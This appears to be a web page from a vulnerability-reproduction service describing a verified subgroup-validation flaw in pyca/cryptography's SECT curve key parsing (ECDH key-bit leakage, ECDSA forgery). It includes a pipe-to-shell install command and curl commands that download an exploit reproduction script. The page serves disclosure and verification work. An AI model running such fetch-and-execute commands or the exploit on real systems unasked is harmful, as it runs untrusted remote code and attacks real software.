REPRO-2026-00089 HIGH Verified

pyca/cryptography SECT curve public key parsing lacks subgroup validation, enabling small-subgroup attacks that leak ECDH private key bits and allow ECDSA signature forgery.

Feb 15, 2026

Open in Codespaces Download Script Download Variant Script

Confidence HIGH

Reproduced in 6m 32s

Tool calls 68

What's the vulnerability?

pyca/cryptography SECT curve public key parsing lacks subgroup validation, enabling small-subgroup attacks that leak ECDH private key bits and allow ECDSA signature forgery.

Root Cause Analysis

Variant Analysis

Bypass and alternate trigger exploration (if present).

One Command

Verify with pruva-verify

Run the Pruva CLI to automatically fetch and execute the reproduction script.

pruva-verify REPRO-2026-00089

or pruva-verify GHSA-R6PH-V2QM-Q3C2

or pruva-verify CVE-2026-26007

Install: curl -fsSL https://pruva.dev/install.sh | sh

Or Run Manually

Download the script

curl -O https://pruva.dev/api/v1/reproductions/REPRO-2026-00089/artifacts/repro/reproduction_steps.sh

Make executable

chmod +x reproduction_steps.sh

Run the script

./reproduction_steps.sh

Run in a VM, container, or disposable environment. This exploits a real vulnerability.

How Pruva Reproduced This

Watch the AI agent's step-by-step process.

Loading session...

Artifacts

repro/rca_report.md2.7 KB

repro/reproduction_steps.sh1.6 KB

vuln_variant/rca_report.md4.4 KB

vuln_variant/reproduction_steps.sh3.0 KB

bundle/ticket.md2.1 KB

logs/repro_output.txt0.3 KB

logs/pip_install.txt0.4 KB

vuln_variant/patch_analysis.md1.3 KB

logs/variant_attempts.txt1.0 KB

logs/variant_pip_install.txt0.4 KB